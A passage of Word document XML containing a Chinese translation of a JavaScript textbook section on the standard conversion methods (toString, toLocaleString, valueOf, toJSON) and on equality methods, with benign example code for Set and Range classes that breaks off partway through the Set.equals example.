      </w:pPr>
      <w:bookmarkStart w:id="238" w:name="9_6_3_Biao_Zhun_Zhuan_Huan_Fang_Fa_"/>
      <w:r>
        <w:t>9.6.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　标准转换方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="238"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>3.8.3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　和</w:t>
      </w:r>
      <w:r>
        <w:t>6.10</w:t>
      </w:r>
      <w:r>
        <w:t>节讨论了对象类型转换所用到的重要方法，有一些方法是在需要做类型转换时由</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>解释器自动调用的。不需要为定义的每个类都实现这些方法，但这些</w:t>
      </w:r>
      <w:r>
        <w:t>方法的确非常重要，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>如果没有为自定义的类实现这些方法，也应当是有意为之，而不应当因为疏忽而漏掉了它们。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>最重要的方法首当</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>。这个方法的作用是返回一个可以表示这个对象的字符串。在希望使用字符串的地方用到对象的话（比如将对象用做属性名或使用</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符来进行字符串连接运算），</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>会自动调用这个方法。如果没有实现这个方法，类会默认从</w:t>
      </w:r>
      <w:r>
        <w:t>Object.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>中继承</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这个方法的运算结果是</w:t>
      </w:r>
      <w:r>
        <w:t>"[object Object]"</w:t>
      </w:r>
      <w:r>
        <w:t>，这个字符串用处不大。</w:t>
      </w:r>
      <w:r>
        <w:t>toStri</w:t>
      </w:r>
      <w:r>
        <w:t>ng()</w:t>
      </w:r>
      <w:r>
        <w:t>方法应当返回一个可读的字符串，这样最终用户才能将这个输出值利用起来，然而有时候并不一定非要如此，不管怎样，可以返回可读字符串的</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法也会让程序调试变得更加轻松。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-2</w:t>
      </w:r>
      <w:r>
        <w:t>和例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类和</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>类都定义了</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>中的枚举类型也定义了</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>。下面我们会给例</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类也定义</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>极为类似：</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleStri ng()</w:t>
      </w:r>
      <w:r>
        <w:t>是以本地敏感性（</w:t>
      </w:r>
      <w:r>
        <w:t>local</w:t>
      </w:r>
      <w:r>
        <w:t>e-sensitive</w:t>
      </w:r>
      <w:r>
        <w:t>）的方式来将对象转换为字符串。默认情况下，对象所继承的</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只是简单地调用</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。有一些内置类型包含有用的</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用以实际上返回本地化相关的字符串。如果需要为对象到字</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>符串的转换定义</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，那么同样需要定义</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用以处理本地化的对象到字符串的转换。下面的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的定义中会有相关代码。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第三个方法是</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>，它用来将对象转换为原始值。比如，当数学运算符（除了</w:t>
      </w:r>
      <w:r>
        <w:t>“+”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符）和关系运算符作用于数字文本表示的对象时，会自动调用</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。大多数对象都没有合适的原始值来表示它们，也没有定义这个方法。但在例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>中的枚举类型的实现则说明</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法是非常重要的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第四个方法是</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>，这个方法是由</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>自动调用的。</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>格式用于序列化良好的数据结构，而且可以处理</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>原始值、数组和纯对象。它和类无关，当对一个对象执行序列化操作时，它会忽略对象的原型和构造函数。比如将</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象或</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
      <w:r>
        <w:t>作为参数传入</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify()</w:t>
      </w:r>
      <w:r>
        <w:t>，将会返回诸如</w:t>
      </w:r>
      <w:r>
        <w:t>{"form":1,"to":3}</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>{"r":1,"i":-1}</w:t>
      </w:r>
      <w:r>
        <w:t>这种字符串。如果将这些字符串传入</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.parse()</w:t>
      </w:r>
      <w:r>
        <w:t>，则会得到一个和</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>对象具有相同属性的纯对象，但这个对象不会包含从</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>继承来的方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这种序列化操作非常适用于诸如</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>这种类，但对于其他一些类则必须自定义</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法来定制个性化的序列化格</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>式。如果一个对象有</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，</w:t>
      </w:r>
      <w:r>
        <w:t>JSON.stringify</w:t>
      </w:r>
      <w:r>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:t>并不会对传入的对象做序列化操作，而会调用</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>来执行序列化操作（序列化的值可能是原始值也可能是对象）。比如，</w:t>
      </w:r>
      <w:r>
        <w:t>Date</w:t>
      </w:r>
      <w:r>
        <w:t>对象的</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法可以返回一个表示日期的字符串。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-7</w:t>
      </w:r>
      <w:r>
        <w:t>中的枚举类型也是如此：它们的</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法和</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>方法完全一样。如果要模拟一个集合，最接近</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>的表示方法就是数组，因此在下面的例子中将定义</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法用以将集合对象转换为值数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>例</w:t>
      </w:r>
      <w:r>
        <w:t>9-6</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类并没有定义上述方法中的任何一个。</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中没有哪个原始值可以表示集合，因此</w:t>
      </w:r>
      <w:r>
        <w:t>也没必要定义</w:t>
      </w:r>
      <w:r>
        <w:t>valueOf()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，但该类应当包含</w:t>
      </w:r>
      <w:r>
        <w:t>toString()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>toJSON()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。可以用如下代码来实现。注意</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>函数（例</w:t>
      </w:r>
      <w:r>
        <w:t>6-2</w:t>
      </w:r>
      <w:r>
        <w:t>）的用法，这里使用</w:t>
      </w:r>
      <w:r>
        <w:t>extend()</w:t>
      </w:r>
      <w:r>
        <w:t>来向</w:t>
      </w:r>
      <w:r>
        <w:t>Set.prototype</w:t>
      </w:r>
      <w:r>
        <w:t>来添加方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>将这些方法添加至</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类的原型对象中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>extend(Set.prototype,{//</w:t>
      </w:r>
      <w:r>
        <w:t>将集合转换为字符串</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toString:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="{",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.foreach(function(v){s+=((i+</w:t>
      </w:r>
      <w:r>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0)?",":"")+v;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return s+"}";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},//</w:t>
      </w:r>
      <w:r>
        <w:t>类似</w:t>
      </w:r>
      <w:r>
        <w:t>toString,</w:t>
      </w:r>
      <w:r>
        <w:t>但是对于所有的值都将调用</w:t>
      </w:r>
      <w:r>
        <w:t>toLocaleString()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toLocaleString:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var s="{",i=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.foreach(function(v){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i++</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>0)s+=",";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(v==null)s+=v;//null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>else s+=v.toLocaleString();//</w:t>
      </w:r>
      <w:r>
        <w:t>其他情况</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return s+"}";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>},//</w:t>
      </w:r>
      <w:r>
        <w:t>将集合转换为值数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>toArray:function(){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var a=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>this.foreach(function(v){a.push(v);});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>});//</w:t>
      </w:r>
      <w:r>
        <w:t>对于要从</w:t>
      </w:r>
      <w:r>
        <w:t>JSON</w:t>
      </w:r>
      <w:r>
        <w:t>转换为字符串的集合都被当做数组来对待</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.toJSON=Set.prototype.toArray;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="239" w:name="9_6_4_Bi_Jiao_Fang_Fa_"/>
      <w:r>
        <w:t>9.6.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　比较方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="239"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>的相等运算符比较对象时，比较的是引用而不是值。也就是说，给定两个对象引用，如果要看它们是否指向同一个对象，不是检查这两个对象是</w:t>
      </w:r>
      <w:r>
        <w:t>否具有相同的属性名和相同的属性值，而是直接比较这两个单独的对象是否相等，或者比较它们的顺序（就像</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>运算符进行的比较一样）。如果定义一个类，并且希望比较类的实例，应该定义合适的方法来执行比较操作。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>编程语言有很多用于对象比较的方法，将</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中的这些方法借用到</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中是一个不错的主意。为了能让自定义类的实例具备比较的功能，定义一个名叫</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>实例方法。这个方法只能接收一个实参，如果这个实参和调用此方法的对象相等的话则返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>。当然，这里所说的</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>相等</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>的含义是根据类</w:t>
      </w:r>
      <w:r>
        <w:t>的上下文来决</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>定的。对于简单的类，可以通过简单地比较它们的</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性来确保两个对象是相同类型，然后比较两个对象的实例属性以保证它们的值相等。例</w:t>
      </w:r>
      <w:r>
        <w:t>9-3</w:t>
      </w:r>
      <w:r>
        <w:t>中的</w:t>
      </w:r>
      <w:r>
        <w:t>Complex</w:t>
      </w:r>
      <w:r>
        <w:t>类就实现了这样的</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，我们可以轻易地为</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>类也实现类似的方法：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//Range</w:t>
      </w:r>
      <w:r>
        <w:t>类重写它的</w:t>
      </w:r>
      <w:r>
        <w:t>constructor</w:t>
      </w:r>
      <w:r>
        <w:t>属性，现在将它添加进去</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Range.prototype.constructor=Range;//</w:t>
      </w:r>
      <w:r>
        <w:t>一个</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象和其他不是</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>的对象均不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当且仅当两个范围的端点相等，它们才相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Ra</w:t>
      </w:r>
      <w:r>
        <w:t>nge.prototype.equals=function(that){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(that==null)return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>处理</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>undefined</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(that.constructor!==Range)return false;//</w:t>
      </w:r>
      <w:r>
        <w:t>处理非</w:t>
      </w:r>
      <w:r>
        <w:t>Range</w:t>
      </w:r>
      <w:r>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>当且仅当两个端点相等，才返回</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return this.from==that.from</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>this.to==that.to;</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给</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>类定义</w:t>
      </w:r>
      <w:r>
        <w:t>equals()</w:t>
      </w:r>
      <w:r>
        <w:t>方法稍微有些复杂。不能简单地比较两个集合的</w:t>
      </w:r>
      <w:r>
        <w:t>values</w:t>
      </w:r>
      <w:r>
        <w:t>属性，还要进行更深层次的比较：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>Set.prototype.equals=function(that){//</w:t>
      </w:r>
      <w:r>
        <w:t>一些次要情况的快捷处理</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(this===that)return true;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>that</w:t>
      </w:r>
      <w:r>
        <w:t>对象不是一个集合，它和</w:t>
      </w:r>
      <w:r>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:t>不相等</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>我们用到了</w:t>
      </w:r>
      <w:r>
        <w:t>instanceof</w:t>
      </w:r>
      <w:r>
        <w:t>，使得这个方法可以用于</w:t>
      </w:r>
      <w:r>
        <w:t>Set</w:t>
      </w:r>
      <w:r>
        <w:t>的任何子类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果希望采用鸭式辩型的方法，可以降低检查的严格程度</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>或者可以通过</w:t>
      </w:r>
      <w:r>
        <w:t>this.constructor==th</w:t>
      </w:r>
      <w:r>
        <w:t>at.constructor</w:t>
      </w:r>
      <w:r>
        <w:t>来加强检查的严格程度</w:t>
      </w:r>
